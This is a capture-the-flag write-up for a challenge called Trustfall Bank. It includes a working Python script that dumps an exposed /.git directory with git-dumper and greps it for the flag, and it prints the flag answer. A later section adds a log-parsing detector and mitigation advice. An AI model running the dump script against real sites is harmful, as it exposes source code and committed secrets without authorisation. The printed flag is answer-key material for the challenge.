Trustfall Bank – TOKEN1

Token: PCCC{C0d3_L3ak_mC_5098}

Background

The site exposes /.git. Dumping the repo and grepping config files reveals the live token in a configuration file.

From Nothing to Working

  1. Detect .git exposure on http://trustfallbank.us/.git.
  2. Dump the repo with git-dumper into trustfall_dump/.
  3. Check out the files and grep the config files for PCCC{...} to extract the token.

Command

Run from any directory on Kali:

python3 quick_git_token1.py

#!/usr/bin/env python3
# quick_git_token1.py
import os, subprocess, sys, shutil

TARGET = "http://trustfallbank.us/.git"
OUTDIR = "trustfall_dump"

def run(cmd):
    # Echo the command, then run it; raise if it exits non-zero.
    print("+", " ".join(cmd))
    return subprocess.run(cmd, check=True)

def main():
    # Install git-dumper if it is not already on PATH.
    if shutil.which("git-dumper") is None:
        run([sys.executable, "-m", "pip", "install", "git-dumper"])

    # Start from a clean output directory.
    if os.path.isdir(OUTDIR):
        shutil.rmtree(OUTDIR)

    # Download the exposed repository, then restore the working tree from it.
    run(["git-dumper", TARGET, OUTDIR])
    os.chdir(OUTDIR)
    subprocess.run(["git", "checkout", "--", "."], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

    print("\n[+] Searching config files for token...")
    # List candidate config files, then grep the whole tree for the flag prefix.
    subprocess.run(["find", ".", "-type", "f", "-name", "config*"])
    r = subprocess.run(["grep", "-R", "PCCC{", "."], capture_output=True, text=True)
    print(r.stdout.strip())

if __name__ == "__main__":
    main()

Expected Output

Grep prints the token:

PCCC{C0d3_L3ak_mC_5098}
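
Detection

The dump described in steps 1 to 3 leaves a recognisable trail in the web server's access log. The following is an added example, not part of the original write-up: it flags clients that were actually served files under /.git/. The log lines, IP addresses, the function name and the min_served threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Constructed sample lines in combined log format (not taken from the original page).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2025:10:01:02 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.31"
198.51.100.7 - - [01/Jan/2025:10:01:02 +0000] "GET /.git/config HTTP/1.1" 200 137 "-" "python-requests/2.31"
198.51.100.7 - - [01/Jan/2025:10:01:03 +0000] "GET /.git/objects/3f/9a0c1d2e HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.7 - - [01/Jan/2025:10:01:03 +0000] "GET /.git/objects/aa/bb11cc22 HTTP/1.1" 404 153 "-" "python-requests/2.31"
203.0.113.9 - - [01/Jan/2025:11:15:40 +0000] "GET /%2egit/HEAD HTTP/1.1" 403 153 "-" "curl/8.5"
192.0.2.44 - - [01/Jan/2025:11:20:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Jan/2025:11:20:05 +0000] "GET /blog/my.github.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# client IP, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
# ".git" as a whole path segment, so "/blog/my.github.html" does not match
GIT_PATH_RE = re.compile(r"(?:^|/)\.git(?:/|$)")

def git_exposure_report(log_text, min_served=3):
    """Per client: .git paths served with 2xx, refused requests, and a dump verdict."""
    stats = defaultdict(lambda: {"served": [], "blocked": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        path = unquote(urlsplit(target).path)  # decode %2e so "/%2egit/" is caught too
        if not GIT_PATH_RE.search(path):
            continue
        if status.startswith("2"):
            stats[ip]["served"].append(path)   # the repository content really left the server
        else:
            stats[ip]["blocked"] += 1          # probe that was refused or missed
    return {
        ip: {**s, "likely_dump": len(s["served"]) >= min_served}
        for ip, s in stats.items()
    }

if __name__ == "__main__":
    for ip, info in git_exposure_report(SAMPLE_LOG).items():
        print(ip, info)
```

Any 2xx response under /.git/ means the repository is exposed: deny that path at the web server and rotate every secret that was ever committed.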